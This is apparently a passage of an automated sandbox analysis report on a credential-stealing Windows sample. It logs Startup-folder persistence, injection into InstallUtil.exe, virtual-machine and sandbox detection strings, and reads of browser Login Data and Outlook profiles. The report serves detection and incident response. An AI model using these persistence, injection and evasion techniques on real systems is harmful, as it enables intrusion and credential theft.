                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Ref#116670.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Ref#116670.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#116670.exe, 00000000.00000002.2269468767.00000000061F0000.00000004.08000000.00040000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003C35000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#116670.exe, 00000000.00000002.2269468767.00000000061F0000.00000004.08000000.00040000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003CCD000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2508374788.0000000003C35000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Ref#116670.exe, 00000000.00000002.2261839160.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, Ref#116670.exe, 00000000.00000002.2271016118.00000000069B0000.00000004.08000000.00040000.00000000.sdmp

                    Data Obfuscation

                    Source: 0.2.Ref#116670.exe.388a820.4.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.Ref#116670.exe.388a820.4.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.Ref#116670.exe.388a820.4.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.Ref#116670.exe.388a820.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.Ref#116670.exe.388a820.4.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.Ref#116670.exe.38da840.0.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.Ref#116670.exe.38da840.0.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.Ref#116670.exe.38da840.0.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.Ref#116670.exe.38da840.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.Ref#116670.exe.38da840.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: Yara matchFile source: 5.2.vdvfyt.exe.3ad97e0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ref#116670.exe.6950000.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Ref#116670.exe.38097e0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000005.00000002.2508374788.0000000003AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2498291909.00000000029A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2270876798.0000000006950000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2250767887.000000000272F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Ref#116670.exe PID: 6648, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vdvfyt.exe PID: 5704, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Ref#116670.exe File created: C:\Users\user\AppData\Roaming\vdvfyt.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\Ref#116670.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vdvfyt.vbs
                    Source: C:\Users\user\Desktop\Ref#116670.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    Source: Yara match File source: Process Memory Space: Ref#116670.exe PID: 6648, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: vdvfyt.exe PID: 5704, type: MEMORYSTR
                    Source: Ref#116670.exe, 00000000.00000002.2250767887.000000000272F000.00000004.00000800.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2498291909.00000000029A0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\Ref#116670.exe Memory allocated: 9C0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Ref#116670.exe Memory allocated: 2680000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Ref#116670.exe Memory allocated: 23B0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 1280000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2D40000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 2B50000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Memory allocated: E40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Memory allocated: 2950000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Memory allocated: 2690000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: BE0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 28A0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Memory allocated: 48A0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Ref#116670.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                    Source: C:\Users\user\Desktop\Ref#116670.exe Window / User API: threadDelayed 7818
                    Source: C:\Users\user\Desktop\Ref#116670.exe Window / User API: threadDelayed 2023
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Window / User API: threadDelayed 2511
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Window / User API: threadDelayed 6735
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860 Thread sleep count: 32 > 30
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860 Thread sleep time: -29514790517935264s >= -30000s
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 2860 Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 6488 Thread sleep count: 7818 > 30
                    Source: C:\Users\user\Desktop\Ref#116670.exe TID: 6488 Thread sleep count: 2023 > 30
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292 Thread sleep time: -23980767295822402s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 2292 Thread sleep time: -100000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 6448 Thread sleep count: 2511 > 30
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe TID: 6448 Thread sleep count: 6735 > 30
                    Source: C:\Users\user\Desktop\Ref#116670.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Ref#116670.exe Thread delayed: delay time: 100000
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Thread delayed: delay time: 100000
                    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\
                    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
                    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\
                    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
                    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
                    Source: Ref#116670.exe, 00000000.00000002.2270089173.0000000006700000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: TUmyRCEx7iWm3dHgFsl
                    Source: InstallUtil.exe, 00000003.00000002.3284277419.0000000000FF1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM
                    Source: vdvfyt.exe, 00000005.00000002.2498291909.00000000029A0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                    Source: vdvfyt.exe, 00000005.00000002.2498291909.00000000029A0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: model0Microsoft|VMWare|Virtual
                    Source: Ref#116670.exe, 00000000.00000002.2249245132.000000000084E000.00000004.00000020.00020000.00000000.sdmp, vdvfyt.exe, 00000005.00000002.2495432018.0000000000BD1000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000007.00000002.3285264512.0000000000C55000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Ref#116670.exe Process information queried: ProcessInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 3_2_0128C148 LdrInitializeThunk,LdrInitializeThunk,3_2_0128C148
                    Source: C:\Users\user\Desktop\Ref#116670.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\Ref#116670.exe Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\Ref#116670.exe Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: Ref#116670.exe, PortablePublisher.cs Reference to suspicious API methods: EngineConsumer.RunVirtualAllocator(_000E_2009_2002_2005_0003(), reference, pol, isproc)
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, NativeMethods.cs Reference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
                    Source: 0.2.Ref#116670.exe.61f0000.5.raw.unpack, ResourceReferenceValue.cs Reference to suspicious API methods: NativeMethods.LoadLibrary(ResourceFilePath)
                    Source: C:\Users\user\Desktop\Ref#116670.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\Ref#116670.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\Desktop\Ref#116670.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                    Source: C:\Users\user\Desktop\Ref#116670.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 41A000
                    Source: C:\Users\user\Desktop\Ref#116670.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 41C000
                    Source: C:\Users\user\Desktop\Ref#116670.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: C00008
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 41A000
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 41C000
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7DD008
                    Source: C:\Users\user\Desktop\Ref#116670.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Roaming\vdvfyt.exe "C:\Users\user\AppData\Roaming\vdvfyt.exe"
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                    Source: C:\Users\user\Desktop\Ref#116670.exe Queries volume information: C:\Users\user\Desktop\Ref#116670.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Ref#116670.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Ref#116670.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Ref#116670.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Queries volume information: C:\Users\user\AppData\Roaming\vdvfyt.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\vdvfyt.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Ref#116670.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match File source: 0.2.Ref#116670.exe.3689550.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Ref#116670.exe.3689550.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 5.2.vdvfyt.exe.3bf0660.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 5.2.vdvfyt.exe.3bf0660.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Ref#116670.exe PID: 6648, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6780, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: vdvfyt.exe PID: 5704, type: MEMORYSTR
                    Source: Yara match File source: 0.2.Ref#116670.exe.3689550.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Ref#116670.exe.3689550.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 5.2.vdvfyt.exe.3bf0660.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 5.2.vdvfyt.exe.3bf0660.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Ref#116670.exe PID: 6648, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: vdvfyt.exe PID: 5704, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 4956, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: Yara match File source: 0.2.Ref#116670.exe.3689550.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Ref#116670.exe.3689550.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 5.2.vdvfyt.exe.3bf0660.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 5.2.vdvfyt.exe.3bf0660.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.3287082945.0000000002E8B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000003.00000002.3283657783.0000000000414000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000007.00000002.3286734948.00000000029F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Ref#116670.exe PID: 6648, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6780, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: vdvfyt.exe PID: 5704, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 4956, type: MEMORYSTR

                    Remote Access Functionality

                    Source: Yara match File source: 0.2.Ref#116670.exe.3689550.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Ref#116670.exe.3689550.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 5.2.vdvfyt.exe.3bf0660.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 5.2.vdvfyt.exe.3bf0660.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.2261839160.0000000003681000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000005.00000002.2508374788.0000000003BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.2261839160.0000000003701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: Ref#116670.exe PID: 6648, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: InstallUtil.exe PID: 6780, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: vdvfyt.exe PID: 5704, type: MEMORYSTR
                    Source: Yara match File source: 0.2.Ref#116670.exe.3689550.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.Ref#116670.exe.3689550.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 5.2.vdvfyt.exe.3bf0660.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 5.2.vdvfyt.exe.3bf0660.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000005.00000002.2508374788.0000000003C14000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
